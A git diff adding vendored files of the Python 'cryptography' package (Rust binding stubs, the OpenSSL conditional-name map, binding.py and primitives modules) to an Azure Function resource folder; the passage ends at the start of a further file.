a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/__init__.pyi b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/__init__.pyi new file mode 100644 index 0000000..1a1fae7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/__init__.pyi @@ -0,0 +1,2 @@ +def check_pkcs7_padding(data: bytes) -> bool: ... +def check_ansix923_padding(data: bytes) -> bool: ... diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/asn1.pyi b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/asn1.pyi new file mode 100644 index 0000000..4d40fcc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/asn1.pyi @@ -0,0 +1,12 @@ +import typing + +class TestCertificate: + not_after_tag: int + not_before_tag: int + issuer_value_tags: typing.List[int] + subject_value_tags: typing.List[int] + +def decode_dss_signature(signature: bytes) -> typing.Tuple[int, int]: ... +def encode_dss_signature(r: int, s: int) -> bytes: ... +def parse_spki_for_data(data: bytes) -> bytes: ... +def test_parse_certificate(data: bytes) -> TestCertificate: ... diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/ocsp.pyi b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/ocsp.pyi new file mode 100644 index 0000000..b111092 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/ocsp.pyi @@ -0,0 +1,22 @@ +import typing + +from cryptography.hazmat.primitives.asymmetric.types import PRIVATE_KEY_TYPES +from cryptography.hazmat.primitives import hashes +from cryptography.x509 import Extension +from cryptography.x509.ocsp import ( + OCSPRequest, + OCSPRequestBuilder, + OCSPResponse, + OCSPResponseStatus, + OCSPResponseBuilder, +) + +def load_der_ocsp_request(data: bytes) -> OCSPRequest: ... +def load_der_ocsp_response(data: bytes) -> OCSPResponse: ... +def create_ocsp_request(builder: OCSPRequestBuilder) -> OCSPRequest: ... +def create_ocsp_response( + status: OCSPResponseStatus, + builder: typing.Optional[OCSPResponseBuilder], + private_key: typing.Optional[PRIVATE_KEY_TYPES], + hash_algorithm: typing.Optional[hashes.HashAlgorithm], +) -> OCSPResponse: ... diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/x509.pyi b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/x509.pyi new file mode 100644 index 0000000..2ea11c8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/x509.pyi @@ -0,0 +1,36 @@ +import datetime +import typing + +from cryptography import x509 +from cryptography.hazmat.primitives import hashes +from cryptography.hazmat.primitives.asymmetric.types import PRIVATE_KEY_TYPES + +def load_pem_x509_certificate(data: bytes) -> x509.Certificate: ... +def load_der_x509_certificate(data: bytes) -> x509.Certificate: ... +def load_pem_x509_crl(data: bytes) -> x509.CertificateRevocationList: ... +def load_der_x509_crl(data: bytes) -> x509.CertificateRevocationList: ... +def load_pem_x509_csr(data: bytes) -> x509.CertificateSigningRequest: ... +def load_der_x509_csr(data: bytes) -> x509.CertificateSigningRequest: ... +def encode_name_bytes(name: x509.Name) -> bytes: ... +def encode_extension_value(extension: x509.ExtensionType) -> bytes: ... +def create_x509_certificate( + builder: x509.CertificateBuilder, + private_key: PRIVATE_KEY_TYPES, + hash_algorithm: typing.Optional[hashes.HashAlgorithm], +) -> x509.Certificate: ... +def create_x509_csr( + builder: x509.CertificateSigningRequestBuilder, + private_key: PRIVATE_KEY_TYPES, + hash_algorithm: typing.Optional[hashes.HashAlgorithm], +) -> x509.CertificateSigningRequest: ... +def create_x509_crl( + builder: x509.CertificateRevocationListBuilder, + private_key: PRIVATE_KEY_TYPES, + hash_algorithm: typing.Optional[hashes.HashAlgorithm], +) -> x509.CertificateRevocationList: ... + +class Sct: ... +class Certificate: ... +class RevokedCertificate: ... +class CertificateRevocationList: ... +class CertificateSigningRequest: ... diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__init__.py new file mode 100644 index 0000000..171557e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__init__.py @@ -0,0 +1,3 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..88658ed Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/_conditional.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/_conditional.cpython-39.pyc new file mode 100644 index 0000000..f60d812 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/_conditional.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/binding.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/binding.cpython-39.pyc new file mode 100644 index 0000000..fcfdc0c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/binding.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/_conditional.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/_conditional.py new file mode 100644 index 0000000..4f0bcd8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/_conditional.py @@ -0,0 +1,367 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + + +def cryptography_has_ec2m() -> typing.List[str]: + return [ + "EC_POINT_get_affine_coordinates_GF2m", + ] + + +def cryptography_has_ssl3_method() -> typing.List[str]: + return [ + "SSLv3_method", + "SSLv3_client_method", + "SSLv3_server_method", + ] + + +def cryptography_has_110_verification_params() -> typing.List[str]: + return ["X509_CHECK_FLAG_NEVER_CHECK_SUBJECT"] + + +def cryptography_has_set_cert_cb() -> typing.List[str]: + return [ + "SSL_CTX_set_cert_cb", + "SSL_set_cert_cb", + ] + + +def cryptography_has_ssl_st() -> typing.List[str]: + return [ + "SSL_ST_BEFORE", + "SSL_ST_OK", + "SSL_ST_INIT", + "SSL_ST_RENEGOTIATE", + ] + + +def cryptography_has_tls_st() -> typing.List[str]: + return [ + "TLS_ST_BEFORE", + "TLS_ST_OK", + ] + + +def cryptography_has_scrypt() -> typing.List[str]: + return [ + "EVP_PBE_scrypt", + ] + + +def cryptography_has_evp_pkey_dhx() -> typing.List[str]: + return [ + "EVP_PKEY_DHX", + ] + + +def cryptography_has_mem_functions() -> typing.List[str]: + return [ + "Cryptography_CRYPTO_set_mem_functions", + ] + + +def cryptography_has_x509_store_ctx_get_issuer() -> typing.List[str]: + return [ + "X509_STORE_get_get_issuer", + "X509_STORE_set_get_issuer", + ] + + +def cryptography_has_ed448() -> typing.List[str]: + return [ + "EVP_PKEY_ED448", + "NID_ED448", + ] + + +def cryptography_has_ed25519() -> typing.List[str]: + return [ + "NID_ED25519", + "EVP_PKEY_ED25519", + ] + + +def cryptography_has_poly1305() -> typing.List[str]: + return [ + "NID_poly1305", + "EVP_PKEY_POLY1305", + ] + + +def cryptography_has_oneshot_evp_digest_sign_verify() -> typing.List[str]: + return [ + "EVP_DigestSign", + "EVP_DigestVerify", + ] + + +def cryptography_has_evp_digestfinal_xof() -> typing.List[str]: + return [ + "EVP_DigestFinalXOF", + ] + + +def cryptography_has_evp_pkey_get_set_tls_encodedpoint() -> typing.List[str]: + return [ + "EVP_PKEY_get1_tls_encodedpoint", + "EVP_PKEY_set1_tls_encodedpoint", + ] + + +def cryptography_has_fips() -> typing.List[str]: + return [ + "FIPS_mode_set", + "FIPS_mode", + ] + + +def cryptography_has_psk() -> typing.List[str]: + return [ + "SSL_CTX_use_psk_identity_hint", + "SSL_CTX_set_psk_server_callback", + "SSL_CTX_set_psk_client_callback", + ] + + +def cryptography_has_psk_tlsv13() -> typing.List[str]: + return [ + "SSL_CTX_set_psk_find_session_callback", + "SSL_CTX_set_psk_use_session_callback", + "Cryptography_SSL_SESSION_new", + "SSL_CIPHER_find", + "SSL_SESSION_set1_master_key", + "SSL_SESSION_set_cipher", + "SSL_SESSION_set_protocol_version", + ] + + +def cryptography_has_custom_ext() -> typing.List[str]: + return [ + "SSL_CTX_add_client_custom_ext", + "SSL_CTX_add_server_custom_ext", + "SSL_extension_supported", + ] + + +def cryptography_has_openssl_cleanup() -> typing.List[str]: + return [ + "OPENSSL_cleanup", + ] + + +def cryptography_has_tlsv13() -> typing.List[str]: + return [ + "TLS1_3_VERSION", + "SSL_OP_NO_TLSv1_3", + ] + + +def cryptography_has_tlsv13_functions() -> typing.List[str]: + return [ + "SSL_VERIFY_POST_HANDSHAKE", + "SSL_CTX_set_ciphersuites", + "SSL_verify_client_post_handshake", + "SSL_CTX_set_post_handshake_auth", + "SSL_set_post_handshake_auth", + "SSL_SESSION_get_max_early_data", + "SSL_write_early_data", + "SSL_read_early_data", + "SSL_CTX_set_max_early_data", + ] + + +def cryptography_has_keylog() -> typing.List[str]: + return [ + "SSL_CTX_set_keylog_callback", + "SSL_CTX_get_keylog_callback", + ] + + +def cryptography_has_raw_key() -> typing.List[str]: + return [ + "EVP_PKEY_new_raw_private_key", + "EVP_PKEY_new_raw_public_key", + "EVP_PKEY_get_raw_private_key", + "EVP_PKEY_get_raw_public_key", + ] + + +def cryptography_has_engine() -> typing.List[str]: + return [ + "ENGINE_by_id", + "ENGINE_init", + "ENGINE_finish", + "ENGINE_get_default_RAND", + "ENGINE_set_default_RAND", + "ENGINE_unregister_RAND", + "ENGINE_ctrl_cmd", + "ENGINE_free", + "ENGINE_get_name", + "Cryptography_add_osrandom_engine", + "ENGINE_ctrl_cmd_string", + "ENGINE_load_builtin_engines", + "ENGINE_load_private_key", + "ENGINE_load_public_key", + "SSL_CTX_set_client_cert_engine", + ] + + +def cryptography_has_verified_chain() -> typing.List[str]: + return [ + "SSL_get0_verified_chain", + ] + + +def cryptography_has_srtp() -> typing.List[str]: + return [ + "SSL_CTX_set_tlsext_use_srtp", + "SSL_set_tlsext_use_srtp", + "SSL_get_selected_srtp_profile", + ] + + +def cryptography_has_get_proto_version() -> typing.List[str]: + return [ + "SSL_CTX_get_min_proto_version", + "SSL_CTX_get_max_proto_version", + "SSL_get_min_proto_version", + "SSL_get_max_proto_version", + ] + + +def cryptography_has_providers() -> typing.List[str]: + return [ + "OSSL_PROVIDER_load", + "OSSL_PROVIDER_unload", + "ERR_LIB_PROV", + "PROV_R_WRONG_FINAL_BLOCK_LENGTH", + "PROV_R_BAD_DECRYPT", + ] + + +def cryptography_has_op_no_renegotiation() -> typing.List[str]: + return [ + "SSL_OP_NO_RENEGOTIATION", + ] + + +def cryptography_has_dtls_get_data_mtu() -> typing.List[str]: + return [ + "DTLS_get_data_mtu", + ] + + +def cryptography_has_300_fips() -> typing.List[str]: + return [ + "EVP_default_properties_is_fips_enabled", + "EVP_default_properties_enable_fips", + ] + + +def cryptography_has_ssl_cookie() -> typing.List[str]: + return [ + "SSL_OP_COOKIE_EXCHANGE", + "DTLSv1_listen", + "SSL_CTX_set_cookie_generate_cb", + "SSL_CTX_set_cookie_verify_cb", + ] + + +def cryptography_has_pkcs7_funcs() -> typing.List[str]: + return [ + "SMIME_write_PKCS7", + "PEM_write_bio_PKCS7_stream", + "PKCS7_sign_add_signer", + "PKCS7_final", + "PKCS7_verify", + "SMIME_read_PKCS7", + "PKCS7_get0_signers", + ] + + +def cryptography_has_bn_flags() -> typing.List[str]: + return [ + "BN_FLG_CONSTTIME", + "BN_set_flags", + "BN_prime_checks_for_size", + ] + + +def cryptography_has_evp_pkey_dh() -> typing.List[str]: + return [ + "EVP_PKEY_set1_DH", + ] + + +def cryptography_has_300_evp_cipher() -> typing.List[str]: + return ["EVP_CIPHER_fetch", "EVP_CIPHER_free"] + + +def cryptography_has_unexpected_eof_while_reading() -> typing.List[str]: + return ["SSL_R_UNEXPECTED_EOF_WHILE_READING"] + + +# This is a mapping of +# {condition: function-returning-names-dependent-on-that-condition} so we can +# loop over them and delete unsupported names at runtime. It will be removed +# when cffi supports #if in cdef. We use functions instead of just a dict of +# lists so we can use coverage to measure which are used. +CONDITIONAL_NAMES = { + "Cryptography_HAS_EC2M": cryptography_has_ec2m, + "Cryptography_HAS_SSL3_METHOD": cryptography_has_ssl3_method, + "Cryptography_HAS_110_VERIFICATION_PARAMS": ( + cryptography_has_110_verification_params + ), + "Cryptography_HAS_SET_CERT_CB": cryptography_has_set_cert_cb, + "Cryptography_HAS_SSL_ST": cryptography_has_ssl_st, + "Cryptography_HAS_TLS_ST": cryptography_has_tls_st, + "Cryptography_HAS_SCRYPT": cryptography_has_scrypt, + "Cryptography_HAS_EVP_PKEY_DHX": cryptography_has_evp_pkey_dhx, + "Cryptography_HAS_MEM_FUNCTIONS": cryptography_has_mem_functions, + "Cryptography_HAS_X509_STORE_CTX_GET_ISSUER": ( + cryptography_has_x509_store_ctx_get_issuer + ), + "Cryptography_HAS_ED448": cryptography_has_ed448, + "Cryptography_HAS_ED25519": cryptography_has_ed25519, + "Cryptography_HAS_POLY1305": cryptography_has_poly1305, + "Cryptography_HAS_ONESHOT_EVP_DIGEST_SIGN_VERIFY": ( + cryptography_has_oneshot_evp_digest_sign_verify + ), + "Cryptography_HAS_EVP_PKEY_get_set_tls_encodedpoint": ( + cryptography_has_evp_pkey_get_set_tls_encodedpoint + ), + "Cryptography_HAS_FIPS": cryptography_has_fips, + "Cryptography_HAS_PSK": cryptography_has_psk, + "Cryptography_HAS_PSK_TLSv1_3": cryptography_has_psk_tlsv13, + "Cryptography_HAS_CUSTOM_EXT": cryptography_has_custom_ext, + "Cryptography_HAS_OPENSSL_CLEANUP": cryptography_has_openssl_cleanup, + "Cryptography_HAS_TLSv1_3": cryptography_has_tlsv13, + "Cryptography_HAS_TLSv1_3_FUNCTIONS": cryptography_has_tlsv13_functions, + "Cryptography_HAS_KEYLOG": cryptography_has_keylog, + "Cryptography_HAS_RAW_KEY": cryptography_has_raw_key, + "Cryptography_HAS_EVP_DIGESTFINAL_XOF": ( + cryptography_has_evp_digestfinal_xof + ), + "Cryptography_HAS_ENGINE": cryptography_has_engine, + "Cryptography_HAS_VERIFIED_CHAIN": cryptography_has_verified_chain, + "Cryptography_HAS_SRTP": cryptography_has_srtp, + "Cryptography_HAS_GET_PROTO_VERSION": cryptography_has_get_proto_version, + "Cryptography_HAS_PROVIDERS": cryptography_has_providers, + "Cryptography_HAS_OP_NO_RENEGOTIATION": ( + cryptography_has_op_no_renegotiation + ), + "Cryptography_HAS_DTLS_GET_DATA_MTU": cryptography_has_dtls_get_data_mtu, + "Cryptography_HAS_300_FIPS": cryptography_has_300_fips, + "Cryptography_HAS_SSL_COOKIE": cryptography_has_ssl_cookie, + "Cryptography_HAS_PKCS7_FUNCS": cryptography_has_pkcs7_funcs, + "Cryptography_HAS_BN_FLAGS": cryptography_has_bn_flags, + "Cryptography_HAS_EVP_PKEY_DH": cryptography_has_evp_pkey_dh, + "Cryptography_HAS_300_EVP_CIPHER": cryptography_has_300_evp_cipher, + "Cryptography_HAS_UNEXPECTED_EOF_WHILE_READING": ( + cryptography_has_unexpected_eof_while_reading + ), +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/binding.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/binding.py new file mode 100644 index 0000000..6526c02 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/binding.py @@ -0,0 +1,230 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import threading +import types +import typing +import warnings + +import cryptography +from cryptography import utils +from cryptography.exceptions import InternalError +from cryptography.hazmat.bindings._openssl import ffi, lib +from cryptography.hazmat.bindings.openssl._conditional import CONDITIONAL_NAMES + +_OpenSSLErrorWithText = typing.NamedTuple( + "_OpenSSLErrorWithText", + [("code", int), ("lib", int), ("reason", int), ("reason_text", bytes)], +) + + +class _OpenSSLError: + def __init__(self, code: int, lib: int, reason: int): + self._code = code + self._lib = lib + self._reason = reason + + def _lib_reason_match(self, lib: int, reason: int) -> bool: + return lib == self.lib and reason == self.reason + + @property + def code(self) -> int: + return self._code + + @property + def lib(self) -> int: + return self._lib + + @property + def reason(self) -> int: + return self._reason + + +def _consume_errors(lib) -> typing.List[_OpenSSLError]: + errors = [] + while True: + code: int = lib.ERR_get_error() + if code == 0: + break + + err_lib: int = lib.ERR_GET_LIB(code) + err_reason: int = lib.ERR_GET_REASON(code) + + errors.append(_OpenSSLError(code, err_lib, err_reason)) + + return errors + + +def _errors_with_text( + errors: typing.List[_OpenSSLError], +) -> typing.List[_OpenSSLErrorWithText]: + errors_with_text = [] + for err in errors: + buf = ffi.new("char[]", 256) + lib.ERR_error_string_n(err.code, buf, len(buf)) + err_text_reason: bytes = ffi.string(buf) + + errors_with_text.append( + _OpenSSLErrorWithText( + err.code, err.lib, err.reason, err_text_reason + ) + ) + + return errors_with_text + + +def _consume_errors_with_text(lib): + return _errors_with_text(_consume_errors(lib)) + + +def _openssl_assert( + lib, ok: bool, errors: typing.Optional[typing.List[_OpenSSLError]] = None +) -> None: + if not ok: + if errors is None: + errors = _consume_errors(lib) + errors_with_text = _errors_with_text(errors) + + raise InternalError( + "Unknown OpenSSL error. This error is commonly encountered when " + "another library is not cleaning up the OpenSSL error stack. If " + "you are using cryptography with another library that uses " + "OpenSSL try disabling it before reporting a bug. Otherwise " + "please file an issue at https://github.com/pyca/cryptography/" + "issues with information on how to reproduce " + "this. ({0!r})".format(errors_with_text), + errors_with_text, + ) + + +def build_conditional_library(lib, conditional_names): + conditional_lib = types.ModuleType("lib") + conditional_lib._original_lib = lib # type: ignore[attr-defined] + excluded_names = set() + for condition, names_cb in conditional_names.items(): + if not getattr(lib, condition): + excluded_names.update(names_cb()) + + for attr in dir(lib): + if attr not in excluded_names: + setattr(conditional_lib, attr, getattr(lib, attr)) + + return conditional_lib + + +class Binding: + """ + OpenSSL API wrapper. + """ + + lib: typing.ClassVar = None + ffi = ffi + _lib_loaded = False + _init_lock = threading.Lock() + _legacy_provider: typing.Any = None + _default_provider: typing.Any = None + + def __init__(self): + self._ensure_ffi_initialized() + + def _enable_fips(self) -> None: + # This function enables FIPS mode for OpenSSL 3.0.0 on installs that + # have the FIPS provider installed properly. + _openssl_assert(self.lib, self.lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER) + self._base_provider = self.lib.OSSL_PROVIDER_load( + self.ffi.NULL, b"base" + ) + _openssl_assert(self.lib, self._base_provider != self.ffi.NULL) + self.lib._fips_provider = self.lib.OSSL_PROVIDER_load( + self.ffi.NULL, b"fips" + ) + _openssl_assert(self.lib, self.lib._fips_provider != self.ffi.NULL) + + res = self.lib.EVP_default_properties_enable_fips(self.ffi.NULL, 1) + _openssl_assert(self.lib, res == 1) + + @classmethod + def _register_osrandom_engine(cls): + # Clear any errors extant in the queue before we start. In many + # scenarios other things may be interacting with OpenSSL in the same + # process space and it has proven untenable to assume that they will + # reliably clear the error queue. Once we clear it here we will + # error on any subsequent unexpected item in the stack. + cls.lib.ERR_clear_error() + if cls.lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE: + result = cls.lib.Cryptography_add_osrandom_engine() + _openssl_assert(cls.lib, result in (1, 2)) + + @classmethod + def _ensure_ffi_initialized(cls): + with cls._init_lock: + if not cls._lib_loaded: + cls.lib = build_conditional_library(lib, CONDITIONAL_NAMES) + cls._lib_loaded = True + cls._register_osrandom_engine() + # As of OpenSSL 3.0.0 we must register a legacy cipher provider + # to get RC2 (needed for junk asymmetric private key + # serialization), RC4, Blowfish, IDEA, SEED, etc. These things + # are ugly legacy, but we aren't going to get rid of them + # any time soon. + if cls.lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER: + cls._legacy_provider = cls.lib.OSSL_PROVIDER_load( + cls.ffi.NULL, b"legacy" + ) + _openssl_assert( + cls.lib, cls._legacy_provider != cls.ffi.NULL + ) + cls._default_provider = cls.lib.OSSL_PROVIDER_load( + cls.ffi.NULL, b"default" + ) + _openssl_assert( + cls.lib, cls._default_provider != cls.ffi.NULL + ) + + @classmethod + def init_static_locks(cls): + cls._ensure_ffi_initialized() + + +def _verify_openssl_version(lib): + if ( + lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 + and not lib.CRYPTOGRAPHY_IS_LIBRESSL + and not lib.CRYPTOGRAPHY_IS_BORINGSSL + ): + warnings.warn( + "OpenSSL version 1.1.0 is no longer supported by the OpenSSL " + "project, please upgrade. The next release of cryptography will " + "be the last to support compiling with OpenSSL 1.1.0.", + utils.DeprecatedIn37, + ) + + +def _verify_package_version(version): + # Occasionally we run into situations where the version of the Python + # package does not match the version of the shared object that is loaded. + # This may occur in environments where multiple versions of cryptography + # are installed and available in the python path. To avoid errors cropping + # up later this code checks that the currently imported package and the + # shared object that were loaded have the same version and raise an + # ImportError if they do not + so_package_version = ffi.string(lib.CRYPTOGRAPHY_PACKAGE_VERSION) + if version.encode("ascii") != so_package_version: + raise ImportError( + "The version of cryptography does not match the loaded " + "shared object. This can happen if you have multiple copies of " + "cryptography installed in your Python path. Please try creating " + "a new virtual environment to resolve this issue. " + "Loaded python version: {}, shared object version: {}".format( + version, so_package_version + ) + ) + + +_verify_package_version(cryptography.__version__) + +Binding.init_static_locks() + +_verify_openssl_version(Binding.lib) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__init__.py new file mode 100644 index 0000000..171557e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__init__.py @@ -0,0 +1,3 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..45b024c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_asymmetric.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_asymmetric.cpython-39.pyc new file mode 100644 index 0000000..c375115 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_asymmetric.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_cipheralgorithm.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_cipheralgorithm.cpython-39.pyc new file mode 100644 index 0000000..68940fa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_cipheralgorithm.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_serialization.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_serialization.cpython-39.pyc new file mode 100644 index 0000000..98a23f2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_serialization.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/cmac.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/cmac.cpython-39.pyc new file mode 100644 index 0000000..0e03a39 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/cmac.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/constant_time.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/constant_time.cpython-39.pyc new file mode 100644 index 0000000..7f0e6bb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/constant_time.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hashes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hashes.cpython-39.pyc new file mode 100644 index 0000000..21710fb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hashes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hmac.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hmac.cpython-39.pyc new file mode 100644 index 0000000..1a2e7cc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hmac.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/keywrap.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/keywrap.cpython-39.pyc new file mode 100644 index 0000000..984bb38 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/keywrap.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/padding.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/padding.cpython-39.pyc new file mode 100644 index 0000000..c8079fa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/padding.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/poly1305.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/poly1305.cpython-39.pyc new file mode 100644 index 0000000..7eb591f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/poly1305.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_asymmetric.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_asymmetric.py new file mode 100644 index 0000000..a4c9d96 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_asymmetric.py @@ -0,0 +1,17 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import abc + + +# This exists to break an import cycle. It is normally accessible from the +# asymmetric padding module. + + +class AsymmetricPadding(metaclass=abc.ABCMeta): + @abc.abstractproperty + def name(self) -> str: + """ + A string naming this padding (e.g. "PSS", "PKCS1"). + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_cipheralgorithm.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_cipheralgorithm.py new file mode 100644 index 0000000..d1ef7a5 --- 